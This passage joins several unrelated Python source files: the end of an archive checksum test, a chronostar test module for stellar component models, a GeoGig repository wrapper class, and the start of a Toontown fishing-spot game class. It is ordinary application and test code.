self.assertFalse(_ZipArchive._is_uuid4(uuid_str))
def test_checksums_match(self):
diff = self.archiver.validate_checksums()
self.assertEqual(diff.added, {})
self.assertEqual(diff.removed, {})
self.assertEqual(diff.changed, {})
def test_checksums_mismatch(self):
with (self.archiver.root_dir / 'data' / 'ints.txt').open('w') as fh:
fh.write('999\n')
with (self.archiver.root_dir / 'tamper.txt').open('w') as fh:
fh.write('extra file')
(self.archiver.root_dir / 'VERSION').unlink()
diff = self.archiver.validate_checksums()
self.assertEqual(diff.added,
{'tamper.txt': '296583001b00d2b811b5871b19e0ad28'})
# The contents of most files is either stochastic, or has the current
# version (which is an unknown commit sha1), so just check name
self.assertEqual(list(diff.removed.keys()), ['VERSION'])
self.assertEqual(diff.changed,
{'data/ints.txt': ('c0710d6b4f15dfa88f600b0e6b624077',
'f47bc36040d5c7db08e4b3a457dcfbb2')
})
def test_checksum_backwards_compat(self):
self.tearDown()
with artifact_version(4):
self.setUp()
diff = self.archiver.validate_checksums()
self.assertEqual(diff.added, {})
self.assertEqual(diff.removed, {})
self.assertEqual(diff.changed, {})
if __name__ == '__main__':
unittest.main()
| |
"""
Tests the inheritance class structure of various
component models
If a new concrete component class has been implemented, simply
import, include in COMPONENT_CLASSES dictionary, and provide
some default parameters in DEFAULT_PARS, and it will
automatically be incorporated into tests, ensuring viable
interface has been implemented correctly.
"""
from __future__ import print_function, division, unicode_literals
import numpy as np
import sys
sys.path.insert(0, '..')
from chronostar.component import SphereComponent, EllipComponent, FreeComponent
import chronostar.traceorbit as torb
COMPONENT_CLASSES = {
'sphere':SphereComponent,
'ellip':EllipComponent,
'free':FreeComponent,
# Insert new implementations here
}
MEAN = np.array([0.,1.,2.,3.,4.,5.])
DX = 9.
DY = 12.
DZ = 16.
DU = 3.
DV = 5.
DW = 7.
C_XY = 0.2
C_XZ = -0.9
C_XU = 0.1
C_XV = -0.1
C_XW = 0.4
C_YZ = -0.3
C_YU = 0.1
C_YV = -0.1
C_YW = 0.1
C_ZU = 0.2
C_ZV = 0.1
C_ZW = -0.1
C_UV = 0.1
C_UW = 0.1
C_WU = 0.1
AGE = 20
SPHERE_PARS = np.hstack((MEAN, [DX, DV, AGE]))
ELLIP_PARS = np.hstack((MEAN, [DX, DY, DZ, DV, C_XY, C_XZ, C_YZ, AGE]))
FREE_PARS = np.hstack((MEAN, [DX, DY, DZ, DU, DV, DW,
C_XY, C_XZ, C_XU, C_XV, C_XW,
C_YZ, C_YU, C_YV, C_YW,
C_ZU, C_ZV, C_ZW,
C_UV, C_UW,
C_WU,
AGE]))
DEFAULT_PARS = {
'sphere':SPHERE_PARS,
'ellip':ELLIP_PARS,
'free':FREE_PARS,
# Insert new default pars here
}
TRACEORBIT_FUNCS = {
'galpy' : torb.trace_cartesian_orbit,
'epi' : torb.trace_epicyclic_orbit,
}
def test_general_initialisation():
for name, ComponentClass in COMPONENT_CLASSES.items():
comp = ComponentClass(pars=DEFAULT_PARS[name])
assert np.allclose(MEAN, comp.get_mean())
assert AGE == comp.get_age()
def test_spherecomponent_initialisation():
sphere_comp = SphereComponent(pars=SPHERE_PARS)
assert np.allclose(SPHERE_PARS[:6], sphere_comp._mean)
assert np.allclose(AGE, sphere_comp._age)
assert np.isclose(DX, sphere_comp.get_sphere_dx())
assert np.isclose(DV, sphere_comp.get_sphere_dv())
def test_ellipcomponent_initialisation():
ellip_pars = np.copy(ELLIP_PARS)
# remove correlations for sphere_dx checks
ellip_pars[10:13] = 0.
ellip_comp = EllipComponent(pars=ellip_pars)
assert np.allclose(ellip_pars[:6], ellip_comp._mean)
assert np.allclose(AGE, ellip_comp._age)
sphere_dx = (DX * DY * DZ)**(1./3)
assert np.isclose(sphere_dx, ellip_comp.get_sphere_dx())
assert np.isclose(DV, ellip_comp.get_sphere_dv())
def test_generic_externalise_and_internalise():
for name, ComponentClass in COMPONENT_CLASSES.items():
comp = ComponentClass(pars=DEFAULT_PARS[name])
emcee_pars = comp.get_emcee_pars()
internal_pars = comp.internalise(comp.get_pars())
external_pars = comp.externalise(internal_pars)
# emcee pars and internal pars are the same thing (by definition)
assert np.allclose(emcee_pars, internal_pars)
assert np.allclose(comp.get_pars(), external_pars)
def test_externalise_and_internalise_pars():
"""Check that pars are successfully converted from internal form (used by
emcee) to external form (interacted with by user) successfully"""
# Check SphereComponent
internal_sphere_pars = np.copy(SPHERE_PARS)
internal_sphere_pars[6:8] = np.log(internal_sphere_pars[6:8])
sphere_comp = SphereComponent(emcee_pars=internal_sphere_pars)
external_sphere_pars = sphere_comp.get_pars()
assert np.allclose(SPHERE_PARS, external_sphere_pars)
re_internal_sphere_pars = sphere_comp.internalise(external_sphere_pars)
assert np.allclose(internal_sphere_pars, re_internal_sphere_pars)
# Check EllipComponent
internal_ellip_pars = np.copy(ELLIP_PARS)
internal_ellip_pars[6:10] = np.log(internal_ellip_pars[6:10])
ellip_comp = EllipComponent(emcee_pars=internal_ellip_pars)
external_ellip_pars = ellip_comp.get_pars()
assert np.allclose(ELLIP_PARS, external_ellip_pars)
re_internal_ellip_pars = ellip_comp.internalise(external_ellip_pars)
assert np.allclose(internal_ellip_pars, re_internal_ellip_pars)
def test_simple_projection():
"""
Check negligible change in mean and covmatrix when projected for negligible
timestep
"""
tiny_age = 1e-10
for name, ComponentClass in COMPONENT_CLASSES.items():
comp = ComponentClass(pars=DEFAULT_PARS[name])
comp.update_attribute(attributes={'age':tiny_age})
cov_mat_now = comp.get_covmatrix_now()
assert np.allclose(comp.get_mean(), comp.get_mean_now(), atol=1e-8)
assert np.allclose(comp.get_covmatrix(), comp.get_covmatrix_now(),
atol=1e-4)
def test_split_group_age():
"""
Splitting group by provided ages yields identical initial cov matrix,
and identical current day mean
"""
for name, ComponentClass in COMPONENT_CLASSES.items():
comp = ComponentClass(pars=DEFAULT_PARS[name])
age_offset = 1.
assert age_offset < comp._age #check that we won't get negative ages
lo_age, hi_age = comp._age - age_offset, comp._age + age_offset
lo_comp, hi_comp = comp.split_group_age(lo_age, hi_age)
assert lo_age == lo_comp.get_age()
assert hi_age == hi_comp.get_age()
assert np.allclose(comp.get_covmatrix(), lo_comp.get_covmatrix())
assert np.allclose(comp.get_covmatrix(), hi_comp.get_covmatrix())
assert np.allclose(comp.get_mean_now(), lo_comp.get_mean_now(),
atol=1e-4)
assert np.allclose(comp.get_mean_now(), hi_comp.get_mean_now(),
atol=1e-4)
def test_load_components():
single_filename = 'temp_data/single_comp.npy'
multi_filename = 'temp_data/multi_comp.npy'
for name, ComponentClass in COMPONENT_CLASSES.items():
comp0 = ComponentClass(pars=DEFAULT_PARS[name])
comp1 = ComponentClass(pars=DEFAULT_PARS[name])
ComponentClass.store_raw_components(single_filename, comp0)
ComponentClass.store_raw_components(multi_filename, [comp0, comp1])
single_res = ComponentClass.load_raw_components(single_filename)
assert np.allclose(single_res[0].get_pars(), comp1.get_pars())
multi_res = ComponentClass.load_raw_components(multi_filename)
assert np.allclose(multi_res[0].get_pars(), comp0.get_pars())
assert np.allclose(multi_res[1].get_pars(), comp1.get_pars())
def test_init_from_attributes():
for name, ComponentClass in COMPONENT_CLASSES.items():
comp_orig = ComponentClass(pars=DEFAULT_PARS[name])
tiny_age = 1e-10
comp_orig.update_attribute(attributes={'age':tiny_age})
comp_from_attr = ComponentClass(
attributes={'mean':comp_orig.get_mean(),
'covmatrix':comp_orig.get_covmatrix()}
)
assert np.allclose(comp_orig.get_pars(), comp_from_attr.get_pars())
assert np.allclose(comp_orig.get_covmatrix(),
comp_from_attr.get_covmatrix())
def test_get_best_from_chain():
# Triplicate sphere pars (are copies)
# Represents a chain with 2 walkers and 3 steps
intern_sphere_pars = SphereComponent.internalise(SPHERE_PARS)
dummy_chain = np.array([
[intern_sphere_pars, intern_sphere_pars, intern_sphere_pars],
[intern_sphere_pars, intern_sphere_pars, intern_sphere_pars]
])
dummy_lnprob = np.zeros(dummy_chain.shape[:2])
# Incorporate identifying marker at desired index
true_best_ix = (1,1)
dummy_chain[true_best_ix][0] = 10.
dummy_lnprob[true_best_ix] = 1.
best_comp = SphereComponent.get_best_from_chain(dummy_chain, dummy_lnprob)
assert np.allclose(dummy_chain[true_best_ix], best_comp.get_emcee_pars())
def test_comp_with_diff_traceorbitfuncs():
comps = {torb_name:SphereComponent(SPHERE_PARS, trace_orbit_func=torb_func)
for torb_name, torb_func in TRACEORBIT_FUNCS.items()}
# Assert covmatrix volume approx constant
for name, c in comps.items():
vol_then = np.prod(np.sqrt(np.linalg.eigvalsh(c.get_covmatrix()))),
vol_now = np.prod(np.sqrt(np.linalg.eigvalsh(c.get_covmatrix_now()))),
assert np.isclose(
vol_then, vol_now, rtol=0.1
)
if __name__=='__main__':
test_simple_projection()
| |
import re
from commitish import Commitish
from tag import Tag
import geogig
from geogigexception import GeoGigException
from feature import Feature
from tree import Tree
from utils import mkdir
from py4jconnector import Py4JCLIConnector
from geogigserverconnector import GeoGigServerConnector
import tempfile
import datetime
import re
def _resolveref(ref):
'''
Tries to resolve the pased object into a string representing a commit reference
(a SHA-1, branch name, or something like HEAD~1)
This should be called by all commands using references, so they can accept both
strings and Commitish objects indistinctly
'''
if ref is None:
return None
if isinstance(ref, Commitish):
return ref.ref
elif isinstance(ref, basestring):
return ref
else:
return str(ref)
SHA_MATCHER = re.compile(r"\b([a-f0-9]{40})\b")
class Repository(object):
_logcache = None
def __init__(self, url, connector = None, init = False, initParams = None):
'''
url: The url of the repository. Only file paths are supported so far. Remote repos are not supported
connector: the connector to use to communicate with the repository
init: True if the repository should be initialized
'''
self.url = url
self.connector = Py4JCLIConnector() if connector is None else connector
if init:
try:
mkdir(url)
except Exception, e:
raise GeoGigException("Cannot create repository folder.\nCheck that path is correct and you have permission")
self.connector.setRepository(self)
try:
self.connector.checkisrepo()
isAlreadyRepo = True
except GeoGigException, e:
isAlreadyRepo = False
if init:
if isAlreadyRepo:
raise GeoGigException("Cannot init, the folder is already a geogig repository")
else:
self.init(initParams)
self.connector.checkisrepo()
self.cleancache()
@staticmethod
def newrepofromclone(url, path, connector = None, username = None, password = None):
'''
Clones a given repository into a local folder and returns a repository object representing it
url: the url of the repo to clone
path: the path to clone the repo into
connector: the connector to use to communicate with the repository
'''
connector = Py4JCLIConnector() if connector is None else connector
connector.clone(url, path, username, password)
return Repository(path, connector)
def createdat(self):
'''Returns the creation date of this repository'''
return self.connector.createdat()
def cleancache(self):
self._logcache = None
def description(self):
'''Returns the description of this repository'''
#TODO
return ''
def revparse(self, rev):
'''Returns the SHA-1 of a given element, represented as a string'''
if SHA_MATCHER.match(rev) is not None:
return rev
else:
return self.connector.revparse(rev)
@property
def head(self):
'''Returns a Commitish representing the current HEAD'''
return self.connector.head()
@property
def index(self):
'''Returns a Commitish representing the index'''
return Commitish(self, geogig.STAGE_HEAD)
@property
def workingtree(self):
'''Returns a Commitish representing workingtree'''
return Commitish(self, geogig.WORK_HEAD)
@property
def master(self):
'''Returns a Commitish representing the master branch'''
return Commitish(self, geogig.MASTER)
def isdetached(self):
'''Returns true if the repos has a detached HEAD'''
return self.head.id == self.head.ref
def synced(self, branch = geogig.HEAD, credentials = None):
'''
Returns a tuple with number of (ahead, behind) commits between this repo and a remote
It uses the passed branch or, if not passed, the current branch
If the repository is headless, or if not remote is defined, it will throw an exception
It uses the "origin" remote if it exists, otherwise it uses the first remote available.
If the remote requires authentication, a tuple of (username,password) must be passed
in the credentials parameter
'''
if (branch == geogig.HEAD and self.isdetached()):
raise GeoGigException("Cannot use current branch. The repository has a detached HEAD")
remotes = self.remotes
if remotes:
if "origin" in remotes:
remote = remotes["origin"]
remotename = "origin"
else:
remotename = remotes.keys()[0]
remote = remotes.values()[0]
else:
raise GeoGigException("No remotes defined")
if isremoteurl(remote):
repo = Repository(remote, GeoGigServerConnector(credentials))
else:
conn = self.connector.__class__()
repo = Repository(remote[len("file:/"):], conn)
localtip = self.revparse(branch)
remotetip = repo.revparse(branch)
if remotetip == localtip:
return 0, 0
if remotetip == geogig.NULL_ID:
log = self.log(branch)
push = len(log)
pull = 0
else:
trackedbranchhead = self.revparse("refs/remotes/" + remotename + "/" + branch)
log = self.log(branch, trackedbranchhead)
push = len(log)
log = repo.log(branch, trackedbranchhead)
pull = len(log)
return push, pull
def mergemessage(self):
'''
Return the merge message if the repo is in a merge operation stopped due to conflicts.
Returns an empty string if it is not the case
'''
return self.connector.mergemessage()
def log(self, tip = None, sincecommit = None, until = None, since = None, path = None, n = None):
'''
Returns a list of Commit starting from the passed tip ref, or HEAD if there is no passed ref,
and up to the sincecommit, if passed, or to first commit in the history if not.
If a path is passed, it only returns commits in which that path was modified
Date limits can be passed using the since and until parameters
A maximum number of commits can be set using the n parameter
'''
tip = tip or geogig.HEAD
if path is not None or tip != geogig.HEAD or n is not None or since is not None or until is not None or sincecommit is not None:
return self.connector.log(_resolveref(tip), _resolveref(sincecommit), _resolveref(until), _resolveref(since), path, n)
if self._logcache is None:
self._logcache = self.connector.log(_resolveref(tip), _resolveref(sincecommit), _resolveref(until), _resolveref(since), path, n)
return self._logcache
def commitatdate(self, t):
'''Returns a Commit corresponding to a given instant, which is passed as a datetime.datetime'''
epoch = datetime.datetime.utcfromtimestamp(0)
delta = t - epoch
milisecs = int(delta.total_seconds()) * 1000
log = self.connector.log(geogig.HEAD, until = str(milisecs), n = 1)
if log:
return log[0]
else:
raise GeoGigException("Invalid date for this repository")
@property
def trees(self):
return self._trees()
def _trees(self, ref = geogig.HEAD, path = None, recursive = False):
'''Returns a set of Tree objects with all the trees for the passed ref and path'''
return [e for e in self.children(ref, path, recursive) if isinstance(e, Tree)]
def features(self, ref = geogig.HEAD, path = None, recursive = False):
'''Returns a set of Feature objects with all the features for the passed ref and path'''
return [e for e in self.children(ref, path, recursive) if isinstance(e, Feature)]
def children(self, ref = geogig.HEAD, path = None, recursive = False):
'''Returns a set of Tree and Feature objects with all the children for the passed ref and path'''
return self.connector.children(_resolveref(ref), path, recursive)
@property
def branches(self):
''' Returns a dict with branch names as keys and branch refs as values'''
return self.connector.branches()
@property
def tags(self):
'''Returns a dict with tag names as keys and tag objects as values'''
tags = self.connector.tags()
tags = {k:Tag(self, v, k) for k, v in tags.iteritems()}
return tags
def clone(self, path):
'''Clones this repo in the specified path. Returns a reference to the cloned repo'''
url = self.url.replace('\\', '/')
self.connector.clone(url, path)
return Repository(path, self.connector.__class__(), False)
def createbranch(self, ref, name, force = False, checkout = False):
'''Creates a new branch in the repo. Returns the commitish representing the branch'''
if checkout:
self.cleancache()
return self.connector.createbranch(_resolveref(ref), name, force, checkout)
def deletebranch(self, name):
'''Deletes the passed branch'''
self.connector.deletebranch(name)
def createtag(self, ref, name, message):
'''Creates a new tag, with the passed message'''
self.connector.createtag(_resolveref(ref), name, message)
def deletetag(self, name):
'''Deletes the passed tag'''
self.connector.deletetag(name)
def diff(self, refa = geogig.HEAD, refb = geogig.WORK_HEAD, path = None):
'''Returns a list of DiffEntry representing the changes between 2 commits.
If a path is passed, it only shows changes corresponding to that path'''
return self.connector.diff(_resolveref(refa), _resolveref(refb), path)
def difftreestats(self, refa = geogig.HEAD, refb = geogig.WORK_HEAD):
'''Returns a dict with tree changes statistics for the passed refs. Keys are paths, values are tuples
in the form (added, deleted, modified) corresponding to changes made to that path'''
return self.connector.difftreestats(_resolveref(refa), _resolveref(refb))
def treediff(self, path, refa = geogig.HEAD, refb = geogig.WORK_HEAD):
'''Returns a tuple attributes, features with a description of features changed between the specified refs
Attributes is a dict with attribute names as keys and the description of the attribute as value
Features is a list, with each element being another list representing a feature and the changes
in it between the two specifed versions.
The length of this list is the same as the one of attributes dictionary
The value for an attribute is a tuple of (change_type, old value, new value) in case the change for the
attribute is a modification, or (change_type, value), if the change is a removal, addition or
unmodified'''
return self.connector.treediff(path, _resolveref(refa), _resolveref(refb))
def unstaged(self):
'''Returns a list of diffEntry with the differences between staging area and working tree'''
return self.diff(geogig.STAGE_HEAD, geogig.WORK_HEAD);
def staged(self):
'''Returns a list of diffEntry with the differences between HEAD and Staging area'''
return self.diff(geogig.HEAD, geogig.STAGE_HEAD);
def notindatabase(self):
'''Returns a list of diffEntry with the differences between HEAD and Working Tree'''
return self.diff(geogig.HEAD, geogig.WORK_HEAD);
def conflicts(self):
'''Returns a dict of tuples. Keys are paths, values are tuples with the 3 versions
defining a conflict, as Feature objects'''
conflicts = {}
_conflicts = self.connector.conflicts()
for path, c in _conflicts.iteritems():
c = tuple(Feature(self, ref, path) for ref in c)
conflicts[path] = c
return conflicts
def checkout(self, ref, paths = None, force = False):
'''Checks out the passed ref into the working tree.
If a path list is passed, it will just checkout those paths.
If force is True, it will check out even if the working tree is not clean'''
self.connector.checkout(_resolveref(ref), paths, force)
self.cleancache()
def updatepathtoref(self, ref, paths):
'''
Updates the element in the passed paths to the version corresponding to the passed ref.
If the path is conflicted (unmerged), it will also resolve the conflict
'''
ref = _resolveref(ref)
for path in paths:
self.connector.reset(ref, path = path)
return self.connector.checkout(ref, paths)
def solveconflict(self, path, attributes):
'''
Solves a conflict at the specified path with a new feature defined by the passed attributes.
Attributes are passed in a dict with attribute names as keys and attribute values as values.
This can be used only with features containing one and only one geometry attribute
'''
self.reset(geogig.HEAD, path = path)
self.insertfeature(path, attributes)
self.add([path])
def solveconflicts(self, paths, version = geogig.OURS):
'''
Solves the specified paths with one of the corresponding existing versions (ours or theirs)
Version is specified using geogig.OURS or geogig.THEIRS
'''
self.connector.solveconflicts(paths, version)
def add(self, paths = []):
'''Adds the passed paths to the staging area. If no paths are passed, it will add all the unstaged ones'''
self.connector.add(paths)
def addandcommit(self, message, paths = []):
self.add(paths)
return self.commit(message, paths)
def commit(self, message, paths = []):
'''
Creates a new commit with the changes in the specified paths.
If no paths are passed, it will commit all staged features
Raises an UnconfiguredUserException if there is no user configured and it cannot commit
'''
self.connector.commit(message, paths)
self.cleancache()
#TODO: maybe add the commit instead of invalidating the whole cache
def blame(self, path):
'''
Returns authorship information for the passed path
It is returned as a dict, with attribute names as keys.
Values are tuples of (value, commitid, authorname)
'''
return self.connector.blame(path)
def count(self, ref, path):
'''Returns the count of objects in a given path'''
output = self.show(_resolveref(ref) + ":" + path)
return int(output.split("\n")[1][5:].strip())
def feature(self, ref, path):
'''Returns a Feature object corresponding to the passed ref and path'''
return Feature(self, ref, path)
def featuredata(self, ref, path):
'''
Returns the attributes of a given feature, as a dict with attributes
names as keys and tuples of (attribute_value, attribute_type_name) as values.
Values are converted to appropriate types when possible, otherwise they are stored
as the string representation of the attribute
'''
data = self.connector.featuredata(_resolveref(ref), path)
if len(data) == 0:
raise GeoGigException("The specified feature does not exist")
return data
def featuretype(self, ref, tree):
'''Returns the featuretype of a tree as a dict in the form attrib_name : attrib_type_name'''
return self.connector.featuretype(ref, tree)
def versions(self, path):
'''
Returns all versions os a given feature.
It returns a dict with Commit objects as keys, and feature data for the corresponding
commit as values. Feature data is another dict with attributes
names as keys and tuples of (attribute_value, attribute_type_name) as values.
Values are converted to appropriate types when possible, otherwise they are stored
as the string representation of the attribute
'''
entries = self.log(geogig.HEAD, path = path)
refs = [entry.ref + ":" + path for entry in entries]
versions = []
if refs:
features = self.connector.featuresdata(refs)
for entry, ref in zip(entries, refs):
versions.append((entry, features[ref]))
return versions
def featurediff(self, ref, ref2, path):
'''
Returns a dict with attributes that have changed in the specified feature path between the specified refs
Keys are attribute names. Values are tuples of "(oldvalue, newvalue)"
If the feature has been added, oldvalue = None
If the feature has been removed, newvalue = None
Values are converted to appropriate types if possible, otherwise they are stored as strings
'''
return self.connector.featurediff(_resolveref(ref), _resolveref(ref2), path)
def reset(self, ref, mode = geogig.RESET_MODE_HARD, path = None):
'''Resets the current branch to the passed reference'''
self.connector.reset(ref, mode, path)
self.cleancache()
def exportshp(self, ref, path, shapefile):
self.connector.exportshp(_resolveref(ref), path, shapefile)
def exportsl(self, ref, path, database, user = None, table = None):
'''Export to a SpatiaLite database'''
self.connector.exportsl(_resolveref(ref), path, database, user, table)
# ADDED
def exportgeojson(self, ref, path, geojson):
self.connector.exportgeojson(_resolveref(ref), path, geojson)
def exportpg(self, ref, path, table, database, user, password = None, schema = None, host = None, port = None, overwrite = False):
self.connector.exportpg(_resolveref(ref), path, table, database, user, password, schema, host, port, overwrite)
def importgeojson(self, geojsonfile, add = False, dest = None, idAttribute = None, geomName = None, force = False):
self.connector.importgeojson(geojsonfile, add, dest, idAttribute, geomName, force)
def importshp(self, shpfile, add = False, dest = None, idAttribute = None, force = False):
self.connector.importshp(shpfile, add, dest, idAttribute, force)
def importpg(self, database, user = None, password = None, table = None, schema = None,
host = None, port = None, add = False, dest = None, force = False, idAttribute = None):
self.connector.importpg(database, user, password, table,
schema, host, port, add, dest, force, idAttribute)
def importsl(self, database, table, add = False, dest = None):
self.connector.importsl(database, table, add, dest)
def exportdiffs(self, commit1, commit2, path, filepath, old = False, overwrite = False):
'''Exports the differences in a given tree between to commits, creating a shapefile
with the changed features corresponding to the newest of them, or the oldest if old = False'''
self.connector.exportdiffs(_resolveref(commit1), _resolveref(commit2), path, filepath, old, overwrite)
def insertfeature(self, path, attributes):
'''
Inserts a feature to the working tree.
The attributes are passed in a dict with attribute names as keys and attribute values as values.
There must be one and only one geometry attribute, with a Geometry object.
It will overwrite any feature in the same path, so this can be used to add a new feature or to
modify an existing one
'''
self.connector.insertfeatures({path : attributes})
def insertfeatures(self, features):
'''
Inserts a set of features into the working tree.
Features are passed in a dict with paths as keys and attributes as values
The attributes for each feature are passed in a dict with attribute names as keys and attribute values as values.
There must be one an only one geometry attribute, with a Geometry object.
It will overwrite any feature in the same path, so this can be used to add new features or to
modify existing ones
'''
self.connector.insertfeatures(features)
def removefeatures(self, paths):
'''Removes the passed features paths from the working tree and index, so they are no longer versioned'''
self.connector.removepaths(paths)
def removetrees(self, paths):
'''Removes the passed tree paths from the working tree and index, so they are no longer versioned'''
self.connector.removepaths(paths, True)
def commonancestor(self, refa, refb):
'''
Returns the common ancestor of the two passed references as a commitish object
Returns None if no common ancestor exists for the passed references
'''
return self.connector.commonancestor(refa, refb)
def merge(self, ref, nocommit = False, message = None):
'''Merges the passed ref into the current branch'''
self.connector.merge(_resolveref(ref), nocommit, message)
self.cleancache()
def rebase(self, ref):
'''Rebases the current branch using the passed ref'''
self.connector.rebase(_resolveref(ref))
self.cleancache()
def abort(self):
'''
Abort a merge or rebase operation, if it was stopped due to conflicts
Does nothing if the repo is not in a conflicted state
'''
self.connector.abort()
def continue_(self):
'''
Continues a rebase operation that was stopped due to conflicts
Raises a GeoGigException if the repo is not clean and cannot continue the operation
Does nothing if the repo is not in a conflicted state caused by a rebase operation
'''
self.connector.continue_()
def cherrypick(self, ref):
'''Cherrypicks a commit into the current branch'''
self.connector.cherrypick(_resolveref(ref))
self.cleancache()
@property
def remotes(self):
'''Returns a dict with remote names as keys and remote urls as values'''
return self.connector.remotes()
def addremote(self, name, url, username, password):
'''Adds a new remote'''
self.connector.addremote(name, url, username, password)
def removeremote(self, name):
'''Removes a remote'''
self.connector.removeremote(name)
def ismerging(self):
'''Returns true if the repo is in the middle of a merge stopped due to conflicts'''
return self.connector.ismerging()
def isrebasing(self):
'''Returns true if the repo is in the middle of a rebase stopped due to conflicts'''
return self.connector.isrebasing()
def downloadosm(self, osmurl, bbox, mappingorfile = None):
'''Downloads from a OSM server using the overpass API.
The bbox parameter defines the extent of features to download.
Accepts a mapping object or a string with the path to a mapping file'''
mappingfile = None
if mappingorfile is not None:
mappingfile = self._mapping(mappingorfile)
self.connector.downloadosm(osmurl, bbox, mappingfile)
self.cleancache()
def _mapping(self, mappingorfile):
if isinstance(mappingorfile, basestring):
return mappingorfile
else:
try:
f = tempfile.NamedTemporaryFile(delete = False)
f.write(mappingorfile.asjson())
f.close()
return f.name
finally:
f.close()
def importosm(self, osmfile, add = False, mappingorfile = None):
'''
Imports an osm file.
Accepts a mapping object or a string with the path to a mapping file to define an import mapping
'''
mappingfile = None
if mappingorfile is not None:
mappingfile = self._mapping(mappingorfile)
self.connector.importosm(osmfile, add, mappingfile)
def exportosm(self, osmfile, ref = None, bbox = None):
'''
Exports the OSM data in the repository to an OSM XML file
A bounding box can be passed to be used as a filter.
It is passed as a tuple of 4 elements containing the boundary coordinates in the form (S, W, N, E)
'''
self.connector.exportosm(osmfile, _resolveref(ref), bbox)
def exportosmchangeset(self, osmfile, changesetid = None, refa = None, refb = None):
'''
Exports the difference between the osm data in two commits as a osm changeset.
An alternative changeset id can be used to replace negative ids if they exist
'''
self.connector.exportosmchangeset(osmfile, changesetid, _resolveref(refa), _resolveref(refb))
def maposm(self, mappingorfile):
'''Applies a mapping to the OSM data in the repo.
The mapping can be passed as a file path to a mapping file, or as a OSMMapping object'''
mappingfile = self._mapping(mappingorfile)
self.connector.maposm(mappingfile)
def show(self, ref):
'''Returns the description of an element, as printed by the GeoGig show command'''
return self.connector.show(_resolveref(ref))
def config(self, param, value, global_ = False):
'''Configures a geogig parameter with a the passed value'''
return self.connector.config(param, value, global_)
def getconfig(self, param):
'''Returns the current value for a given parameter'''
return self.connector.getconfig(param)
def pull(self, remote = geogig.ORIGIN, branch = None, rebase = False):
'''
Pulls from the specified remote and specified branch.
If no branch is provided, it will use the name of the current branch, unless the repo is headless.
In that case, and exception will be raised
If rebase == True, it will do a rebase instead of a merge
'''
if branch == None and self.isdetached():
raise GeoGigException("HEAD is detached. Cannot pull")
branch = branch or self.head.ref
self.connector.pull(remote, branch, rebase)
self.cleancache()
def push(self, remote, branch = None, all = False):
'''
Pushes to the specified remote and specified branch.
If no branch is provided, it will use the name of the current branch, unless the repo is headless.
In that case, and exception will be raised.
if all == True, it will push all branches and ignore the branch.
'''
if branch is None and self.isdetached():
raise GeoGigException("HEAD is detached. Cannot push")
branch = branch or self.head.ref
return self.connector.push(remote, branch, all)
def init(self, initParams = None):
'''
Inits the repository.
Init params is a dict of paramName : paramValues to be supplied to the init command
'''
self.connector.init(initParams)
def isremoteurl(url):
##This code snippet has been taken from the Django source code
regex = re.compile(
r'^https?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return url is not None and regex.search(url)
| |
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from direct.directtools.DirectGeometry import LineNodePath
from direct.distributed import DistributedObject
from direct.directnotify import DirectNotifyGlobal
from toontown.toonbase import ToontownGlobals
from toontown.fishing import FishGlobals
from toontown.shtiker import FishPage
from toontown.toonbase import TTLocalizer
from toontown.quest import Quests
from direct.actor import Actor
from direct.showutil import Rope
import math
from direct.task.Task import Task
import random
import random
from toontown.fishing import FishingTargetGlobals
from toontown.fishing import FishBase
from toontown.fishing import FishPanel
from toontown.effects import Ripples
from toontown.toontowngui import TTDialog
from toontown.toonbase import ToontownTimer
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from toontown.hood import ZoneUtil
from toontown.toontowngui import TeaserPanel
class DistributedFishingSpot(DistributedObject.DistributedObject):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedFishingSpot')
vZeroMax = 25.0
angleMax = 30.0
def __init__(self, cr):
if hasattr(self, 'fishInit'):
return
self.fishInit = 1
DistributedObject.DistributedObject.__init__(self, cr)
self.lastAvId = 0
self.lastFrame = 0
self.avId = 0
self.av = None
self.placedAvatar = 0
self.localToonFishing = 0
self.nodePath = None
self.collSphere = None
self.collNode = None
self.collNodePath = None
self.castTrack = None
self.pond = None
self.guiTrack = None
self.madeGui = 0
self.castGui = None
self.itemGui = None
self.pole = None
self.line = None
self.poleNode = []
self.ptop = None
self.bob = None
self.bobBobTask = None
self.splashSounds = None
self.ripples = None
self.line = None
self.lineSphere = None
self.power = 0.0
self.startAngleNP = 0
self.firstCast = 1
self.fishPanel = None
self.fsm = ClassicFSM.ClassicFSM('DistributedFishingSpot', [State.State('off', self.enterOff, self.exitOff, ['waiting',
'distCasting',
'fishing',
'reward',
'leaving']),
State.State('waiting', self.enterWaiting, self.exitWaiting, ['localAdjusting',
'distCasting',
'leaving',
'sellFish']),
State.State('localAdjusting', self.enterLocalAdjusting, self.exitLocalAdjusting, ['localCasting', 'leaving']),
State.State('localCasting', self.enterLocalCasting, self.exitLocalCasting, ['localAdjusting', 'fishing', 'leaving']),
State.State('distCasting', self.enterDistCasting, self.exitDistCasting, ['fishing', 'leaving', 'reward']),
State.State('fishing', self.enterFishing, self.exitFishing, ['localAdjusting',
'distCasting',
'waitForAI',
'reward',
'leaving']),
State.State('sellFish', self.enterSellFish, self.exitSellFish, ['waiting', 'leaving']),
State.State('waitForAI', self.enterWaitForAI, self.exitWaitForAI, ['reward', 'leaving']),
State.State('reward', self.enterReward, self.exitReward, ['localAdjusting',
'distCasting',
'leaving',
'sellFish']),
State.State('leaving', self.enterLeaving, self.exitLeaving, [])], 'off', 'off')
self.fsm.enterInitialState()
return
def disable(self):
self.ignore(self.uniqueName('enterFishingSpotSphere'))
self.setOccupied(0)
self.avId = 0
if self.castTrack != None:
if self.castTrack.isPlaying():
self.castTrack.finish()
self.castTrack = None
if self.guiTrack != None:
if self.guiTrack.isPlaying():
self.guiTrack.finish()
self.guiTrack = None
self.__hideBob()
self.nodePath.detachNode()
self.__unmakeGui()
self.pond.stopCheckingTargets()
self.pond = None
for event in self.getAllAccepting():
if event.startswith('generate-'):
self.ignore(event)
DistributedObject.DistributedObject.disable(self)
return
def delete(self):
if hasattr(self, 'fishDeleted'):
return
self.fishDeleted = 1
del self.pond
